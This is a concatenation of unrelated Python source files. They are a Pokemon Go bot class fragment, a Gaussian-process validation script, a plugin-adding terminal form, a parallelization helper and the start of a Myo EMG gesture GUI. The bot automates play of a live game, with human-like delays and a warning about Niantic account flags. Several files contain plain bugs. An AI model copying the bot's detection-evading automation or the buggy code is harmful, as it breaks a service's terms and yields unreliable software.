stardust = '0'
items_inventory = inventory.items()
if 'amount' in player['currencies'][0]:
pokecoins = player['currencies'][0]['amount']
if 'amount' in player['currencies'][1]:
stardust = player['currencies'][1]['amount']
self.logger.info('')
self.logger.info('--- {username} ---'.format(**player))
self.logger.info(
'Pokemon Bag: {}/{}'.format(
inventory.Pokemons.get_space_used(),
inventory.get_pokemon_inventory_size()
)
)
self.logger.info(
'Items: {}/{}'.format(
inventory.Items.get_space_used(),
inventory.get_item_inventory_size()
)
)
self.logger.info(
'Stardust: {}'.format(stardust) +
' | Pokecoins: {}'.format(pokecoins)
)
# Items Output
self.logger.info(
'PokeBalls: ' + str(items_inventory.get(1).count) +
' | Great Balls: ' + str(items_inventory.get(2).count) +
' | Ultra Balls: ' + str(items_inventory.get(3).count) +
' | Master Balls: ' + str(items_inventory.get(4).count))
self.logger.info(
'RazzBerries: ' + str(items_inventory.get(701).count) +
' | Nanab Berries: ' + str(items_inventory.get(703).count) +
' | Pinap Berries: ' + str(items_inventory.get(705).count) +
' | Golden RazzBerries: ' + str(items_inventory.get(706).count) +
' | Golden Nanab Berries: ' + str(items_inventory.get(707).count) +
' | Golden Pinap Berries: ' + str(items_inventory.get(708).count))
self.logger.info(
'LuckyEgg: ' + str(items_inventory.get(301).count) +
' | Incubator: ' + str(items_inventory.get(902).count))
self.logger.info(
'Potion: ' + str(items_inventory.get(101).count) +
' | Super Potion: ' + str(items_inventory.get(102).count) +
' | Hyper Potion: ' + str(items_inventory.get(103).count) +
' | Max Potion: ' + str(items_inventory.get(104).count))
self.logger.info(
'Incense: ' + str(items_inventory.get(401).count) +
' | Lure Module: ' + str(items_inventory.get(501).count))
self.logger.info(
'Revive: ' + str(items_inventory.get(201).count) +
' | Max Revive: ' + str(items_inventory.get(202).count))
self.logger.info(
'Sun Stone: ' + str(items_inventory.get(1101).count) +
' | Kings Rock: ' + str(items_inventory.get(1102).count) +
' | Metal Coat: ' + str(items_inventory.get(1103).count) +
' | Dragon Scale: ' + str(items_inventory.get(1104).count) +
' | Upgrade: ' + str(items_inventory.get(1105).count))
self.logger.info(
'Fast TM: ' + str(items_inventory.get(1201).count) +
' | Charge TM: ' + str(items_inventory.get(1202).count) +
' | Rare Candy: ' + str(items_inventory.get(1301).count) +
' | Free Raid Pass: ' + str(items_inventory.get(1401).count) +
' | Premium Raid Pass: ' + str(items_inventory.get(1402).count) +
' | Legendary Raid Pass: ' + str(items_inventory.get(1403).count))
if warn:
self.logger.info('')
self.event_manager.emit(
'niantic_warning',
sender=self,
level='warning',
formatted="This account has recieved a warning from Niantic. Bot at own risk."
)
sleep(5) # Pause to allow user to see warning
self.logger.info('')
def _print_list_pokemon(self):
# get pokemon list
bag = inventory.pokemons().all()
id_list = list(set(map(lambda x: x.pokemon_id, bag)))
id_list.sort()
pokemon_list = [filter(lambda x: x.pokemon_id == y, bag) for y in id_list]
show_count = self.config.pokemon_bag_show_count
show_candies = self.config.pokemon_bag_show_candies
poke_info_displayed = self.config.pokemon_bag_pokemon_info
def get_poke_info(info, pokemon):
poke_info = {
'cp': 'CP {}'.format(pokemon.cp),
'iv_ads': 'A/D/S {}/{}/{}'.format(pokemon.iv_attack, pokemon.iv_defense, pokemon.iv_stamina),
'iv_pct': 'IV {}'.format(pokemon.iv),
'ivcp': 'IVCP {}'.format(round(pokemon.ivcp,2)),
'ncp': 'NCP {}'.format(round(pokemon.cp_percent,2)),
'level': "Level {}".format(pokemon.level),
'hp': 'HP {}/{}'.format(pokemon.hp, pokemon.hp_max),
'moveset': 'Moves: {}'.format(pokemon.moveset),
'dps': 'DPS {}'.format(round(pokemon.moveset.dps, 2))
}
if info not in poke_info:
raise ConfigException("info '{}' isn't available for displaying".format(info))
return poke_info[info]
self.logger.info('Pokemon:')
for pokes in pokemon_list:
pokes.sort(key=lambda p: p.cp, reverse=True)
line_p = '#{} {}'.format(pokes[0].pokemon_id, pokes[0].name)
if show_count:
line_p += '[{}]'.format(len(pokes))
if show_candies:
line_p += '[{} candies]'.format(pokes[0].candy_quantity)
line_p += ': '
poke_info = ['({})'.format(', '.join([get_poke_info(x, p) for x in poke_info_displayed])) for p in pokes]
self.logger.info(line_p + ' | '.join(poke_info))
self.logger.info('')
def use_lucky_egg(self):
request = self.api.create_request()
request.use_item_xp_boost(item_id=301)
return request.call()
def _set_starting_position(self):
self.event_manager.emit(
'set_start_location',
sender=self,
level='info',
formatted='Setting start location.'
)
has_position = False
if self.config.test:
# TODO: Add unit tests
return
if self.wake_location:
msg = "Wake up location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': self.wake_location['raw'],
'position': self.wake_location['coord']
}
)
self.api.set_position(*self.wake_location['coord'])
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
return
if self.config.location:
location_str = self.config.location
location = self.get_pos_by_name(location_str.replace(" ", ""))
msg = "Location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': location_str,
'position': location
}
)
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
if self.config.location_cache:
try:
# save location flag used to pull the last known location from
# the location.json
self.event_manager.emit(
'load_cached_location',
sender=self,
level='debug',
formatted='Loading cached location...'
)
json_file = os.path.join(_base_dir, 'data', 'last-location-%s.json' % self.config.username)
try:
with open(json_file, "r") as infile:
location_json = json.load(infile)
except (IOError, ValueError):
# Unable to read json file.
# File may be corrupt. Create a new one.
location_json = []
except:
raise FileIOException("Unexpected error reading from {}".web_inventory)
location = (
location_json['lat'],
location_json['lng'],
location_json['alt'],
)
# If location has been set in config, only use cache if starting position has not differed
if has_position and 'start_position' in location_json:
last_start_position = tuple(location_json.get('start_position', []))
# Start position has to have been set on a previous run to do this check
if last_start_position and last_start_position != self.start_position:
msg = 'Going to a new place, ignoring cached location.'
self.event_manager.emit(
'location_cache_ignored',
sender=self,
level='debug',
formatted=msg
)
return
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='debug',
formatted='Loaded location {current_position} from cache',
data={
'current_position': location,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
has_position = True
except Exception:
if has_position is False:
sys.exit(
"No cached Location. Please specify initial location."
)
self.event_manager.emit(
'location_cache_error',
sender=self,
level='debug',
formatted='Parsing cached location failed.'
)
def get_pos_by_name(self, location_name):
# Check if given location name, belongs to favorite_locations
favorite_location_coords = self._get_pos_by_fav_location(location_name)
if favorite_location_coords is not None:
return favorite_location_coords
# Check if the given location is already a coordinate.
if ',' in location_name:
possible_coordinates = re.findall(
"[-]?\d{1,3}(?:[.]\d+)?", location_name
)
if len(possible_coordinates) >= 2:
# 2 matches, this must be a coordinate. We'll bypass the Google
# geocode so we keep the exact location.
self.logger.info(
'[x] Coordinates found in passed in location, '
'not geocoding.'
)
return float(possible_coordinates[0]), float(possible_coordinates[1]), (float(possible_coordinates[2]) if len(possible_coordinates) == 3 else self.alt)
geolocator = GoogleV3(api_key=self.config.gmapkey)
loc = geolocator.geocode(location_name, timeout=10)
return float(loc.latitude), float(loc.longitude), float(loc.altitude)
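# Editor's note (hedged illustration, not part of the original bot): a location
# string such as "40.7128, -74.0060" produces two regex matches above, so the
# method returns (40.7128, -74.0060, self.alt) without geocoding, while
# "40.7128, -74.0060, 10.0" also picks up the altitude; anything else, e.g. a
# place name, is resolved through the GoogleV3 geocoder instead.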
def _get_pos_by_fav_location(self, location_name):
location_name = location_name.lower()
coords = None
for location in self.config.favorite_locations:
if location.get('name').lower() == location_name:
coords = re.findall(
"[-]?\d{1,3}[.]\d{3,7}", location.get('coords').strip()
)
if len(coords) >= 2:
self.logger.info('Favorite location found: {} ({})'.format(location_name, coords))
break
#TODO: This is real bad
if coords is None:
return coords
else:
return float(coords[0]), float(coords[1]), (float(coords[2]) if len(coords) == 3 else self.alt)
def heartbeat(self):
# Remove forts that we can now spin again.
now = time.time()
self.fort_timeouts = {id: timeout for id, timeout
in self.fort_timeouts.iteritems()
if timeout >= now * 1000}
if now - self.last_heartbeat >= self.heartbeat_threshold and not self.hb_locked:
previous_heartbeat = self.last_heartbeat
self.last_heartbeat = now
request = self.api.create_request()
request.get_player()
request.check_awarded_badges()
request.get_inbox()
responses = None
try:
responses = request.call()
except NotLoggedInException:
self.logger.warning('Unable to login, retrying')
self.empty_response = True
except:
self.logger.warning('Error occurred in heartbeat, retrying')
self.empty_response = True
if not self.empty_response:
if responses['responses']['GET_PLAYER']['success'] == True:
# we get the player_data anyway, might as well store it
self._player = responses['responses']['GET_PLAYER']['player_data']
self.event_manager.emit(
'player_data',
sender=self,
level='debug',
formatted='player_data: {player_data}',
data={'player_data': self._player}
)
if responses['responses']['GET_INBOX']['result'] == 1:
self._inbox = responses['responses']['GET_INBOX']['inbox']
# self.logger.info("Got inbox messages?")
# self.logger.info("Inbox: %s" % responses['responses']['GET_INBOX'])
if 'notifications' in self._inbox:
for notification in self._inbox['notifications']:
notification_date = datetime.datetime.fromtimestamp(int(notification['create_timestamp_ms']) / 1e3)
if previous_heartbeat > (int(notification['create_timestamp_ms']) / 1e3):
# Skip old notifications!
continue
if notification['category'] == 'pokemon_hungry':
gym_name = pokemon = 'Unknown'
for variable in notification['variables']:
if variable['name'] == 'GYM_NAME':
gym_name = variable['literal']
if variable['name'] == 'POKEMON_NICKNAME':
pokemon = variable['literal']
self.event_manager.emit(
'pokemon_hungy',
sender=self,
level='info',
formatted='{pokemon} in the Gym {gym_name} is hungry and wants a candy! {notification_date}',
data={
'pokemon': pokemon,
'gym_name': gym_name,
'notification_date': notification_date.strftime('%Y-%m-%d %H:%M:%S.%f')
}
)
if notification['category'] == 'gym_removal':
gym_name = pokemon = 'Unknown'
for variable in notification['variables']:
if variable['name'] == 'GYM_NAME':
gym_name = variable['literal']
if variable['name'] == 'POKEMON_NICKNAME':
pokemon = variable['literal']
if variable['name'] == 'POKECOIN_AWARDED':
coins_awarded = variable['literal']
if variable['name'] == 'POKECOIN_AWARDED_TODAY':
coins_awarded_today = variable['literal']
self.event_manager.emit(
'pokemon_knock_out_gym',
sender=self,
level='info',
formatted='{pokemon} has been knocked out of the Gym {gym_name} at {notification_date}. Awarded coins: {awarded_coins} | Awarded today: {awarded_coins_today}',
data={
'pokemon': pokemon,
'gym_name': gym_name,
'notification_date': notification_date.strftime('%Y-%m-%d %H:%M:%S.%f'),
'awarded_coins': coins_awarded,
'awarded_coins_today': coins_awarded_today
}
)
if responses['responses']['CHECK_AWARDED_BADGES']['success'] == True:
# store awarded_badges response to be used in a task or as part of the heartbeat
self._awarded_badges = responses['responses']['CHECK_AWARDED_BADGES']
if 'awarded_badges' in self._awarded_badges:
i = 0
for badge in self._awarded_badges['awarded_badges']:
badgelevel = self._awarded_badges['awarded_badge_levels'][i]
badgename = badge_type_pb2._BADGETYPE.values_by_number[badge].name
i += 1
self.event_manager.emit(
'badges',
sender=self,
level='info',
formatted='awarded badge: {badge}, lvl {level}',
data={'badge': badgename,
'level': badgelevel}
)
human_behaviour.action_delay(3, 10)
try:
self.web_update_queue.put_nowait(True) # do this outside of thread every tick
except Queue.Full:
pass
threading.Timer(self.heartbeat_threshold, self.heartbeat).start()
def update_web_location_worker(self):
while True:
self.web_update_queue.get()
# skip update if no response
if not self.empty_response:
self.update_web_location()
def display_player_info(self):
player_stats = player()
if player_stats:
nextlvlxp = (int(player_stats.next_level_xp) - int(player_stats.exp))
self.logger.info(
'Level: {}'.format(player_stats.level) +
' (Next Level: {} XP)'.format(nextlvlxp) +
' (Total: {} XP)'
''.format(player_stats.exp))
self.logger.info(
'Pokemon Captured: '
'{}'.format(player_stats.pokemons_captured) +
' | Pokestops Visited: '
'{}'.format(player_stats.poke_stop_visits))
def get_forts(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'longitude' in fort]
# Need to filter out disabled forts!
forts = filter(lambda x: x["enabled"] is True, forts)
forts = filter(lambda x: 'closed' not in x, forts)
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_gyms(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'type' not in fort]
# Need to filter out disabled gyms!
forts = filter(lambda x: x["enabled"] is True, forts)
forts = filter(lambda x: 'closed' not in x, forts)
# forts = filter(lambda x: 'type' not in fort, forts)
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_map_objects(self, lat, lng, timestamp, cellid):
if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
return self.last_map_object
request = self.api.create_request()
request.get_map_objects(
latitude=f2i(lat),
longitude=f2i(lng),
since_timestamp_ms=timestamp,
cell_id=cellid
)
self.last_map_object = request.call()
self.emit_forts_event(self.last_map_object)
#if self.last_map_object:
# print self.last_map_object
self.last_time_map_object = time.time()
return self.last_map_object
def _load_recent_forts(self):
if not self.config.forts_cache_recent_forts:
return
cached_forts_path = os.path.join(_base_dir, 'data', 'recent-forts-%s.json' % self.config.username)
try:
# load the cached recent forts
cached_recent_forts = []
try:
with open(cached_forts_path) as f:
cached_recent_forts = json.load(f)
except (IOError, ValueError) as e:
self.logger.info('[x] Error while opening cached forts: %s' % e)
except:
raise FileIOException("Unexpected error opening {}".cached_forts_path)
num_cached_recent_forts = len(cached_recent_forts)
num_recent_forts = len(self.recent_forts)
# Handles changes in max_circle_size
if not num_recent_forts:
self.recent_forts = []
elif num_recent_forts > num_cached_recent_forts:
self.recent_forts[-num_cached_recent_forts:] = cached_recent_forts
elif num_recent_forts < num_cached_recent_forts:
self.recent_forts = cached_recent_forts[-num_recent_forts:]
else:
self.recent_forts = cached_recent_forts
self.event_manager.emit(
'loaded_cached_forts',
sender=self,
level='debug',
formatted='Loaded cached forts...'
)
except IOError:
self.event_manager.emit(
'no_cached_forts',
sender=self,
level='debug',
formatted='Starting new cached forts for {path}',
data={'path': cached_forts_path}
)
def _refresh_inventory(self):
# Perform inventory update every n seconds
now = time.time()
if now - self.last_inventory_refresh >= self.inventory_refresh_threshold:
inventory.refresh_inventory()
self.last_inventory_refresh = now
self.inventory_refresh_counter += 1
|
bo_validation.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 19 15:51:02 2015
@author: alexeyche
"""
#from bayesopt import ContinuousGaussModel
#from bayesopt import ContinuousStudentTModel
from matplotlib import pyplot as plt
import random
from multiprocessing import Process, Queue
from collections import defaultdict
import os
from os.path import join as pj
import numpy as np
def make_dir(*a):
if not os.path.exists(pj(*a)):
os.mkdir(pj(*a))
return pj(*a)
#class ConcreteContinuousGaussModel(ContinuousGaussModel):
# def __init__(self, ndim, params):
# assert "Gaussian" in params["surr_name"]
# ContinuousGaussModel.__init__(self, ndim, params)
#
# def evaluateSample(self, Xin):
# pass # mock for now
#
#class ConcreteContinuousStudentTModel(ContinuousStudentTModel):
# def __init__(self, ndim, params):
# assert "StudentT" in params["surr_name"]
# ContinuousStudentTModel.__init__(self, ndim, params)
#
# def evaluateSample(self, Xin):
# pass # mock for now
#
#
#def create_model(ndim, params):
# if "Gaussian" in params["surr_name"]:
# return ConcreteContinuousGaussModel(ndim, params)
# elif "StudentT" in params["surr_name"]:
# return ConcreteContinuousStudentTModel(ndim, params)
# else:
# raise Exception("Unknown model: {}".format(params["surr_name"]))
def generate_validation_ids(n, nfold):
test_idx = random.sample(range(n), n/nfold)
train_idx = []
j = 0
for i in sorted(test_idx):
train_idx += range(j, i)
j = i+1
train_idx += range(j, n)
return train_idx, test_idx
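# Hedged illustration (editor addition, not part of the original script): with
# Python 2 integer division, n=10 and nfold=5 give a 2-element test split and the
# remaining 8 indices for training, and the two lists together cover range(10):
#
#     train_idx, test_idx = generate_validation_ids(10, 5)
#     assert len(test_idx) == 2 and len(train_idx) == 8
#     assert sorted(train_idx + test_idx) == range(10)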
def parallel(f, q):
def wrap(*args, **kwargs):
ret = f(*args, **kwargs)
q.put(ret)
return wrap
def run_validation(X, Y, nfold, params):
test_idx, train_idx = generate_validation_ids(len(X), nfold) # test instead of train on purpose
Xtrain = X[train_idx]
Ytrain = Y[train_idx]
Xtest = X[test_idx]
Ytest = Y[test_idx]
model = create_model(Xtrain.shape[1], params)
model.initWithPoints(Xtrain, Ytrain)
preds = [ model.getPrediction(x) for x in Xtest ]
means = [ p.getMean() for p in preds ]
se = (means-Ytest)**2
mse = sum(se)/len(se)
return Ytest, means, se, mse
def plot_validation(Ytest, means, se, mse):
plt.plot(Ytest, "g-", means, "b-", se, "r-")
plt.title("MSE: {}".format(mse))
def get_validation_params(params = {}):
params["l_all"] = True
params['kernel_name'] = params.get("kernel_name", "kMaternARD5")
params["l_type"] = params.get("l_type", "empirical") # empirical fixed mcmc
params["sc_type"] = params.get("sc_type", "ml") # # map mtl ml loocv
params['verbose_level'] = params.get("verbose_level", 1)
params['surr_name'] = params.get("surr_name", "sGaussianProcessML")
return params
def run_search(X, Y, kernels, nfold, params = {}, generate_plots=True, number_of_runs=100):
kres = defaultdict(list)
if generate_plots:
plt.ioff()
for k in kernels:
params = get_validation_params(params)
params["kernel_name"] = k
procs = []
for fi in xrange(number_of_runs):
q = Queue()
p = Process(target=parallel(run_validation, q), args=(X, Y, nfold, params))
p.start()
procs.append((p, q))
for p, q in procs:
p.join()
kres[k].append(q.get())
if generate_plots:
make_dir(k)
fi = 0
for res in kres[k]:
f = plt.figure()
plot_validation(*res)
f.savefig(pj(k, "{}.png".format(fi)))
plt.close(f)
fi += 1
kres_ag = [ (k, sum([ vr[3] for vr in v ])/len(v)) for k, v in kres.items() ]
if generate_plots:
plt.ion()
return sorted(kres_ag, key=lambda x: x[1])
def combine_kernels(kernels, composite_kernels):
k_ids = np.asarray(range(len(kernels)))
ck_ids = np.asarray(range(len(composite_kernels)))
axis_slices = [k_ids]*3 + [ck_ids]*2
points = np.vstack(np.meshgrid(*axis_slices)).reshape(len(axis_slices), -1).T
kernels_to_search = []
for p in points:
s = "{comp1}({k1}, {comp2}({k2}, {k3}))".format(
comp1 = composite_kernels[p[3]]
, comp2 = composite_kernels[p[4]]
, k1 = kernels[p[0]]
, k2 = kernels[p[1]]
, k3 = kernels[p[2]]
)
kernels_to_search.append(s)
kernels_to_search += kernels
return kernels_to_search
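# Hedged illustration (editor addition): combine_kernels nests every triple of base
# kernels inside every pair of composite operators and then appends the bare kernels,
# so two base kernels and one composite operator yield 2*2*2*1*1 + 2 = 10 candidates:
#
#     combine_kernels(["kMaternARD5", "kSEARD"], ["kSum"])
#     # -> ["kSum(kMaternARD5, kSum(kMaternARD5, kMaternARD5))", ...,
#     #     "kMaternARD5", "kSEARD"]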
|
add.py
|
import threading
import time
import npyscreen
from vent.api.actions import Action
from vent.api.plugin_helpers import PluginHelper
from vent.menus.add_options import AddOptionsForm
from vent.menus.editor import EditorForm
class AddForm(npyscreen.ActionForm):
""" For for adding a new repo """
default_repo = 'https://github.com/cyberreboot/vent-plugins'
def create(self):
""" Create widgets for AddForm """
self.add_handlers({'^T': self.quit, '^Q': self.quit})
self.add(npyscreen.Textfield,
value='Add a plugin from a Git repository or an image from a '
'Docker registry.',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='For Git repositories, you can optionally specify a '
'username and password',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='for private repositories.',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='For Docker images, specify a name for referencing the '
'image that is being',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='added and optionally override the tag and/or the '
'registry and specify',
editable=False,
color='STANDOUT')
self.add(npyscreen.Textfield,
value='comma-separated groups this image should belong to.',
editable=False,
color='STANDOUT')
self.nextrely += 1
self.repo = self.add(npyscreen.TitleText,
name='Repository',
value=self.default_repo)
self.user = self.add(npyscreen.TitleText, name='Username')
self.pw = self.add(npyscreen.TitlePassword, name='Password')
self.nextrely += 1
self.add(npyscreen.TitleText,
name='OR',
editable=False,
labelColor='STANDOUT')
self.nextrely += 1
self.image = self.add(npyscreen.TitleText, name='Image')
self.link_name = self.add(npyscreen.TitleText,
name='Name')
self.tag = self.add(npyscreen.TitleText, name='Tag', value='latest')
self.registry = self.add(npyscreen.TitleText,
name='Registry',
value='docker.io')
self.groups = self.add(npyscreen.TitleText, name='Groups')
self.repo.when_value_edited()
def quit(self, *args, **kwargs):
""" Overridden to switch back to MAIN form """
self.parentApp.switchForm('MAIN')
def on_ok(self):
""" Add the repository """
def popup(thr, add_type, title):
"""
Start the thread and display a popup of the plugin being cloned
until the thread is finished
"""
thr.start()
tool_str = 'Cloning repository...'
if add_type == 'image':
tool_str = 'Pulling image...'
npyscreen.notify_wait(tool_str, title=title)
while thr.is_alive():
time.sleep(1)
return
if self.image.value and self.link_name.value:
api_action = Action()
thr = threading.Thread(target=api_action.add_image, args=(),
kwargs={'image': self.image.value,
'link_name': self.link_name.value,
'tag': self.tag.value,
'registry': self.registry.value,
'groups': self.groups.value})
popup(thr, 'image', 'Please wait, adding image...')
npyscreen.notify_confirm('Done adding image.', title='Added image')
editor_args = {'tool_name': self.image.value,
'version': self.tag.value,
'get_configure': api_action.get_configure,
'save_configure': api_action.save_configure,
'restart_tools': api_action.restart_tools,
'clean': api_action.clean,
'prep_start': api_action.prep_start,
'start_tools': api_action.start,
'from_registry': True,
'just_downloaded': True,
'link_name': self.link_name.value,
'groups': self.groups.value}
self.parentApp.addForm('CONFIGUREIMAGE', EditorForm,
name='Specify vent.template settings for '
'image pulled (optional)', **editor_args)
self.parentApp.change_form('CONFIGUREIMAGE')
elif self.image.value:
npyscreen.notify_confirm('A name needs to be supplied for '
'the image being added!',
title='Specify a name for the image',
form_color='CAUTION')
elif self.repo.value:
self.parentApp.repo_value['repo'] = self.repo.value.lower()
p_helper = PluginHelper()
thr = threading.Thread(target=p_helper.clone, args=(),
kwargs={'repo': self.repo.value.lower(),
'user': self.user.value,
'pw': self.pw.value})
popup(thr, 'repository', 'Please wait, adding repository...')
self.parentApp.addForm('ADDOPTIONS',
AddOptionsForm,
name='Set options for new plugin'
'\t\t\t\t\t\t^Q to quit',
color='CONTROL')
self.parentApp.change_form('ADDOPTIONS')
else:
npyscreen.notify_confirm('Either a repository or an image '
'name must be specified!',
title='Specify plugin to add',
form_color='CAUTION')
return
def on_cancel(self):
""" When user clicks cancel, will return to MAIN """
self.quit()
|
_parallelize.py
|
import os
from multiprocessing import Manager
from threading import Thread
from typing import Any, Callable, Optional, Sequence, Union
from joblib import delayed, Parallel
import numpy as np
from scipy.sparse import issparse, spmatrix
from scvelo import logging as logg
_msg_shown = False
def get_n_jobs(n_jobs):
if n_jobs is None or (n_jobs < 0 and os.cpu_count() + 1 + n_jobs <= 0):
return 1
elif n_jobs > os.cpu_count():
return os.cpu_count()
elif n_jobs < 0:
return os.cpu_count() + 1 + n_jobs
else:
return n_jobs
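# Hedged illustration (editor addition): on an 8-core machine get_n_jobs(None) -> 1,
# get_n_jobs(-1) -> 8, get_n_jobs(-2) -> 7, and any request larger than
# os.cpu_count() is clamped to 8.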
def parallelize(
callback: Callable[[Any], Any],
collection: Union[spmatrix, Sequence[Any]],
n_jobs: Optional[int] = None,
n_split: Optional[int] = None,
unit: str = "",
as_array: bool = True,
use_ixs: bool = False,
backend: str = "loky",
extractor: Optional[Callable[[Any], Any]] = None,
show_progress_bar: bool = True,
) -> Union[np.ndarray, Any]:
"""
Parallelize function call over a collection of elements.
Parameters
----------
callback
Function to parallelize.
collection
Sequence of items which to chunkify.
n_jobs
Number of parallel jobs.
n_split
Split :paramref:`collection` into :paramref:`n_split` chunks.
If `None`, split into :paramref:`n_jobs` chunks.
unit
Unit of the progress bar.
as_array
Whether to convert the results to a :class:`numpy.ndarray`.
use_ixs
Whether to pass indices to the callback.
backend
Which backend to use for multiprocessing. See :class:`joblib.Parallel` for valid
options.
extractor
Function to apply to the result after all jobs have finished.
show_progress_bar
Whether to show a progress bar.
Returns
-------
:class:`numpy.ndarray`
Result depending on :paramref:`extractor` and :paramref:`as_array`.
"""
if show_progress_bar:
try:
try:
from tqdm.notebook import tqdm
except ImportError:
from tqdm import tqdm_notebook as tqdm
import ipywidgets # noqa
except ImportError:
global _msg_shown
tqdm = None
if not _msg_shown:
logg.warn(
"Unable to create progress bar. "
"Consider installing `tqdm` as `pip install tqdm` "
"and `ipywidgets` as `pip install ipywidgets`,\n"
"or disable the progress bar using `show_progress_bar=False`."
)
_msg_shown = True
else:
tqdm = None
def update(pbar, queue, n_total):
n_finished = 0
while n_finished < n_total:
try:
res = queue.get()
except EOFError as e:
if n_finished != n_total:
raise RuntimeError(
f"Finished only `{n_finished}` out of `{n_total}` tasks."
) from e
break
assert res in (None, (1, None), 1)  # (1, None) means only 1 job
if res == (1, None):
n_finished += 1
if pbar is not None:
pbar.update()
elif res is None:
n_finished += 1
elif pbar is not None:
pbar.update()
if pbar is not None:
pbar.close()
def wrapper(*args, **kwargs):
if pass_queue and show_progress_bar:
pbar = None if tqdm is None else tqdm(total=col_len, unit=unit)
queue = Manager().Queue()
thread = Thread(target=update, args=(pbar, queue, len(collections)))
thread.start()
else:
pbar, queue, thread = None, None, None
res = Parallel(n_jobs=n_jobs, backend=backend)(
delayed(callback)(
*((i, cs) if use_ixs else (cs,)),
*args,
**kwargs,
queue=queue,
)
for i, cs in enumerate(collections)
)
res = np.array(res) if as_array else res
if thread is not None:
thread.join()
return res if extractor is None else extractor(res)
col_len = collection.shape[0] if issparse(collection) else len(collection)
if n_split is None:
n_split = get_n_jobs(n_jobs=n_jobs)
if issparse(collection):
if n_split == collection.shape[0]:
collections = [collection[[ix], :] for ix in range(collection.shape[0])]
else:
step = collection.shape[0] // n_split
ixs = [
np.arange(i * step, min((i + 1) * step, collection.shape[0]))
for i in range(n_split)
]
ixs[-1] = np.append(
ixs[-1], np.arange(ixs[-1][-1] + 1, collection.shape[0])
)
collections = [collection[ix, :] for ix in filter(len, ixs)]
else:
collections = list(filter(len, np.array_split(collection, n_split)))
pass_queue = not hasattr(callback, "py_func") # we'd be inside a numba function
return wrapper
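# --- Hedged usage sketch (editor addition, not part of the original module) ---
# The callback name `_square_chunk` is hypothetical; the only contract assumed here
# is the one `wrapper` enforces above: the callback receives chunks of the collection
# plus a `queue` keyword and, when a progress bar is active, reports one `1` per
# processed element followed by `None` once its chunk is done.
if __name__ == "__main__":

    def _square_chunk(chunk, queue=None):
        out = [x * x for x in chunk]
        if queue is not None:
            for _ in chunk:
                queue.put(1)  # one progress tick per element
            queue.put(None)  # mark this chunk as finished
        return out

    result = parallelize(
        _square_chunk, list(range(10)), n_jobs=2, show_progress_bar=False
    )()
    print(result)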
|
gui.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Tkinter import *
import Tkinter
import Similarity
import numpy as np
import rospy, math
from std_msgs.msg import UInt8, String
from sensor_msgs.msg import Imu
from geometry_msgs.msg import Twist, Vector3
from ros_myo.msg import EmgArray
import threading as th
from copy import deepcopy
import ttk, time, fcntl, termios, sys, os
import serial
# ----------------------------------- class -------------------------------------- #
class Subscribers():
def __init__(self):
self.subscriber = rospy.Subscriber('/myo_raw/myo_emg', EmgArray, self.callback)
self.message = EmgArray
self.EMG = [0 for i in range(8)]
self.count1 = 0
self.count2 = 0
self.buf = [0 for i in range(8)]
self.emgs = [0 for i in range(8)]
self.measurement_n = 50
def callback(self, message):
self.emgs = message.data
for i in range(len(self.emgs)):
self.buf[i] += self.emgs[i]
self.count1 += 1
if self.count1 == self.measurement_n:
for i in range(len(self.buf)):
self.EMG[i] = self.buf[i] / self.measurement_n
self.count1 = 0
self.buf = [0 for i in range(8)]
# print(sim.Values)
# print(sim.Simiraly)
# ---------------------------------- functions ------------------------------------ #
def button1_click():
if sub.EMG == None:
return
if tb1.get() == tb_defalt:
tb2_print("Please input pose name")
else:
countdown(2)
sim.Add(deepcopy(sub.EMG))
Posenames.append(tb1.get())
finger_state.append([0, 0, 0, 0, 0, 0])
lb.insert(END, tb1.get())
cb['values'] = Posenames
tb1_clear()
def button2_click():
if cb.current() >= 0:
Posenames.pop(cb.current())
finger_state.pop(cb.current())
sim.Delete(cb.current())
cb['values'] = Posenames
lb_update()
def button3_click():
global st_flg
st_flg = not st_flg
def button4_click():
global finger_state
if tb1.get() == tb_defalt or cb.current() == -1:
tb2_print("Please input finger state")
tb2_print("ex) 1 1 0 1 1 1 ")
else:
arr = tb1.get().split()
print(arr)
finger_state[cb.current()] = arr
def find_proc():
sub_win = Toplevel()
var = StringVar()
l = Label(sub_win, textvariable=var, font=("Helvetica", "96", "bold"))
l.pack()
while True:
pre_ind = -1
while st_flg:
ind, coef = sim.Find(sub.emgs)
# print(ind, coef)
if coef >= Min:
if ind != pre_ind:
tb2.delete("1.0", "end")
tb2.insert(END, "\n {} coef = {}".format(Posenames[ind], round(coef, 4)))
var.set(Posenames[ind])
pre_ind = ind
serialWrite(finger_state[ind])
def change_threshold(*args):
global Min
Min = float(s1.get()) / 100
tb2_print("Min = {}".format(Min))
def change_measurement_n(*args):
sim.measurement_n = s2.get()
tb2_print("Measurement Number = {}".format(sim.measurement_n))
def tb1_clear():
tb1.delete(0, Tkinter.END)
tb1.insert(Tkinter.END, tb_defalt)
def tb2_print(s):
tb2.insert(END, "\n{}".format(s))
tb2.see("end")
def countdown(t):
for i in range(t):
time.sleep(1)
def lb_update():
lb.delete(0, END)
for i in Posenames:
lb.insert(END, i)
def save_param():
global file_name
